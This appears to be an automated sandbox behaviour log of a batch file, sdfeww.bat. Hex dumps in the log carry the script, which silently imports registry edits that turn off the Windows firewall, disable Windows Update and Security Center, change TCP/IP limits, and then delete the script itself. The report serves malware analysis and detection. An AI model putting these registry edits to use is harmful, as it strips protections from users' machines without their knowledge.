C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 3E 3E	success or wait	1	4AD069F8
C:\WINDOWS\Temp\7684d.reg	none	1	0A	success or wait	22	4AD0E081
C:\sdfeww.bat	none	8192	45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 32 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5C 50 61	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5C 50 61 72 61 6D 65 74 65 72 73 5C 46 69 72 65 77 61 6C 6C 50 6F 6C 69 63 79 5C 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 45 6E 61 62 6C 65 46 69 72 65 77 61 6C 6C 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 77 75 61 75 73 65 72 76 5D 3E 3E 25 74 65 6D	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 77 75 61 75 73 65 72 76 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 53 74 61 72 74	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 6F 6E 74 72 6F 6C 53 65 74 30 30 31 5C 53 65 72 76 69 63 65 73 5C 77 73 63 73 76 63 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 6F 6E 74 72 6F 6C 53 65 74 30 30 31 5C 53 65 72 76 69 63 65 73 5C 77 73 63 73 76 63 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 49 6E 74 65 72 6E 61 74 69 6F 6E 61 6C	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 49 6E 74 65 72 6E 61 74 69 6F 6E 61 6C 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 57 32 4B 4C 70 6B 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 54 63 70 69 70 5C 50 61 72 61 6D 65 74 65 72	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 54 63 70 69 70 5C 50 61 72 61 6D 65 74 65 72 73 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 4D 61 78 46 72 65 65 54 63 62 73 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 37 64 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 4D 61 78 48 61 73 68 54 61 62 6C 65 53 69 7A 65 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 38 30 30 3E 3E 25 74 65 6D 70 25 5C	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 4D 61 78 48 61 73 68 54 61 62 6C 65 53 69 7A 65 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 38 30 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 54 63 70 54 69 6D 65 64 57 61 69 74 44 65 6C 61 79 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 31 65 3E 3E 25	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 54 63 70 54 69 6D 65 64 57 61 69 74 44 65 6C 61 79 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 31 65 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 4D 61 78 55 73 65 72 50 6F 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 66 36 31 38 3E 3E 25 74 65 6D 70 25	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 4D 61 78 55 73 65 72 50 6F 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 66 36 31 38 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 53 54 41 52 54 20 2F 57 41 49 54 20 52 45 47 45 44 49 54 20 2F 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 53 54 41 52 54 20 2F 57 41 49 54 20 52 45 47 45 44 49 54 20 2F 53 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	53 54 41 52 54 20 2F 57 41 49 54 20 52 45 47 45 44 49 54 20 2F 53 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	44 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 37 36 38 34 64 2E 72 65 67 0D 0A 00 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	44 45 4C 20 25 30 0D 0A 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 00 45 4C 20 25 30 0D 0A 37 36 38 34 64 2E 72 65 67 0D 0A 00 45 4C 20 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 44 45 4C 20 25 30 0D 0A 54 20 2F 53	success or wait	1	4AD069F8

Other file operations
File Path	Disposition	Data	Ascii Data	Completion	Count	Source Address
C:\sdfeww.bat	PositionInformation	Offset: 0		success or wait	134	4AD069B5
C:\WINDOWS\Temp\7684d.reg	PositionInformation	Offset: 9		success or wait	22	4AD0E066

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	260000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	280000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	2D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	320000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	340000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	420000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\sdfeww.bat	query and read	commit	860000	4096	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	870000	57344	own pid	read write	success or wait	1	4AD0998F
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	880000	126976	own pid	execute	success or wait	1	4AD0998F
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	4AD0998F
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	880000	1208320	own pid	readonly	success or wait	1	4AD0998F
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1	4AD0998F
C:\WINDOWS\regedit.exe	write and read and execute	commit	9B0000	147456	own pid	execute	success or wait	2	4AD0998F
C:\WINDOWS\regedit.exe	query and read	commit	9B0000	147456	own pid	readonly	success or wait	2	4AD0998F

Registry Activities:

Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	DisableUNCCheck	object name not found	2	4AD04A2A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	EnableExtensions	success or wait	2	4AD04A4F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	DelayedExpansion	object name not found	2	4AD04A88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	DefaultColor	success or wait	2	4AD04AAD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	CompletionChar	success or wait	1	4AD04AE5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	PathCompletionChar	success or wait	1	4AD04B37
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	AutoRun	success or wait	1	4AD04BB8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	CompletionChar	success or wait	1	4AD04AE5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	PathCompletionChar	object name not found	1	4AD04B37
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor	AutoRun	object name not found	1	4AD04BB8

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
1500	C:\WINDOWS\regedit.exe	REGEDIT /S C:\WINDOWS\TEMP\7684d.reg	suspended	success or wait	1	4AD0998F

Memory Activities:

Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address
1292	C:\WINDOWS\system32\cmd.exe	850000	12FE10	page read and write	success or wait	1	4AD04578

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1608878966
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1608913022
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1608914420
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1608921475
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1608921937
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1608932543
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1608941307
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1608944327
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 340000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1608969442
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 420000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1608990233
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 420000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1608991827
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1608993378
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1608994114
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1608996327
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1608999282
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DisableUNCCheck	object name not found	1609040367
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: EnableExtensions	success or wait	1609040648
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DelayedExpansion	object name not found	1609040910
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DefaultColor	success or wait	1609041170
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: CompletionChar	success or wait	1609041429
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: PathCompletionChar	success or wait	1609041687
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: AutoRun	success or wait	1609041946
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DisableUNCCheck	object name not found	1609042269
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: EnableExtensions	success or wait	1609042537
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DelayedExpansion	object name not found	1609042796
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DefaultColor	success or wait	1609043056
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: CompletionChar	success or wait	1609043315
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: PathCompletionChar	object name not found	1609043575
Key value queried	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: AutoRun	object name not found	1609043834
Memory allocated	PID: 1292 Path: C:\WINDOWS\system32\cmd.exe Base: 850000 Length: 12FE10 Allocation Type: null Protection: page read and write	success or wait	1609057178
File opened	Path: c:\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident	success or wait	1609111404
File opened	Path: c:\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident	success or wait	1609113249
Section loaded	Path: C:\sdfeww.bat Access: query and read Type: commit Baseaddress: 860000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1609148974
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609153134
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609153304
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 45 63 68 6F 20 52 45 47 45 44 49 54 34 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D	success or wait	1609153477
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609161211
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609161413
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609162355
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609181669
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609181839
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 52 45 47 45 44 49 54 34 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E	success or wait	1609184389
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609189022
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609189788
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609205132
File created	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609205659
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 10 Value: 52 45 47 45 44 49 54 34 0D 0A	success or wait	1609227159
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609245796
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609245974
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 3E 3E	success or wait	1609262611
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609267611
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609267813
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609273069
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609281551
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609282184
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609282353
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 2 Value: 0D 0A	success or wait	1609283070
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609290089
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609290487
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 53	success or wait	1609290665
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609295792
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609310091
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609310316
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609310743
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609311560
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609311731
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 70 Value: 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A	success or wait	1609312127
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609316647
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609316822
File read	Path: C:\sdfeww.bat Offset: none Length: 8192 Value: 45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 32 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59	success or wait	1609317017
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609321338
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609321538
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\sdfeww.bat	success or wait	1609321731
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1609322155
File other operation	Disposition: PositionInformation Data : Offset: 9 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1609322770
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 1 Value: 0A	success or wait	1609322936
File write	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 24 Value: 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 32 0D 0A	success or wait	1609323309
